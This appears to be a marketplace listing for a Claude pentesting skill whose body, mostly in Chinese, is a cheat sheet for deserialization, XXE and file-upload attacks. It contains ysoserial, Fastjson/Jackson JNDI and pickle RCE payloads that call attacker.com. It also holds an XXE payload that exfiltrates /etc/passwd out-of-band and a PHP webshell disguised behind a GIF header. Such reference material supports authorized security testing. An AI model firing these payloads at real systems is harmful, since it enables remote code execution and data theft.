Stats
Actions
Tags
From vuln-skills
Guides pentesting for deserialization (Java ysoserial, Python pickle, PHP unserialize, .NET BinaryFormatter, Ruby Marshal), XXE payloads, and file upload bypasses.
How this skill is triggered — by the user, by Claude, or both
Slash command
/vuln-skills:pentest-deserialization-xxeThe summary Claude sees in its skill listing — used to decide when to auto-load this skill
当对 Web 应用进行反序列化和 XXE 渗透测试时加载此 Skill。覆盖 Java/Python/.NET 反序列化、XML 外部实体注入、危险文件上传等。
当对 Web 应用进行反序列化和 XXE 渗透测试时加载此 Skill。覆盖 Java/Python/.NET 反序列化、XML 外部实体注入、危险文件上传等。
反序列化入口:
ObjectInputStream、JSON 库(Jackson enableDefaultTyping、Fastjson @type)pickle.loads()、yaml.load()(不安全的 Loader)BinaryFormatter、XmlSerializer、ViewStateunserialize()、Phar 反序列化Marshal.load()、YAML Psych.load()(Krewe/Rails)XXE 入口:
危险文件上传:
shell.php.jpgJava 反序列化:
# 使用 ysoserial 生成 payload
java -jar ysoserial.jar CommonsCollections1 "curl attacker.com" > payload.bin
# 常用 Gadget Chain
CommonsCollections1-7 # Apache Commons Collections
Spring1-4 # Spring Framework
Hibernate1 # Hibernate ORM
JRMPClient # 远程类加载
# 检测:发送序列化魔术字节 (0xACED0005) 到可疑端点
Fastjson/Jackson 反序列化:
// Fastjson @type 注入
{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://attacker.com/exploit","autoCommit":true}
// Jackson enableDefaultTyping
["com.sun.rowset.JdbcRowSetImpl",{"dataSourceName":"ldap://attacker.com/exploit","autoCommit":true}]
Python 反序列化:
import pickle, os
class Exploit:
def __reduce__(self):
return (os.system, ("curl attacker.com",))
payload = pickle.dumps(Exploit())
XXE 攻击:
<!-- 基础 XXE(文件读取) -->
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>
<!-- Blind XXE(OOB 数据外传) -->
<!DOCTYPE foo [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
%dtd;
]>
<!-- evil.dtd: <!ENTITY % exfil SYSTEM "http://attacker.com/?data=%file;"> -->
<!-- SSRF via XXE -->
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://internal-server/admin">
]>
危险文件上传利用:
# 扩展名绕过
shell.php5, shell.phtml, shell.pHp # PHP 变体
shell.jsp, shell.jspx, shell.jspa # Java 变体
shell.aspx, shell.ashx, shell.asmx # .NET 变体
# 内容类型绕过
Content-Type: image/jpeg # 但文件内容是 PHP webshell
# 双扩展名
shell.php.jpg # Apache 可能仍解析为 PHP
shell.jpg.php # 真实扩展名在最后
# Magic bytes + webshell
GIF89a<?php system($_GET['cmd']); ?> # GIF magic header + PHP
0xACED 开头的序列化数据漏洞利用可达到的效果:
严重度判断:
以下案例来自 HackerOne 公开披露的真实漏洞报告,展示了该类漏洞在实际目标中的表现形式。
/daip/messagebroker/amf endpoint. Successful exploitation could allow an attac...npx claudepluginhub yhy0/ghsa-skill-builder --plugin vuln-skillsIdentifies and exploits insecure deserialization vulnerabilities in Java, PHP, Python, and .NET apps to achieve RCE during authorized penetration tests. Detects serialized data in traffic like cookies and parameters.
Identifies and exploits insecure deserialization vulnerabilities in Java, PHP, Python, and .NET apps during authorized penetration tests. Uses ysoserial, PHPGGC, and Burp Suite to detect serialized data and achieve RCE.
Identifies and exploits insecure deserialization vulnerabilities in Java, PHP, Python, and .NET apps during authorized penetration tests. Uses ysoserial, PHPGGC, and Burp Suite to detect serialized data and achieve RCE.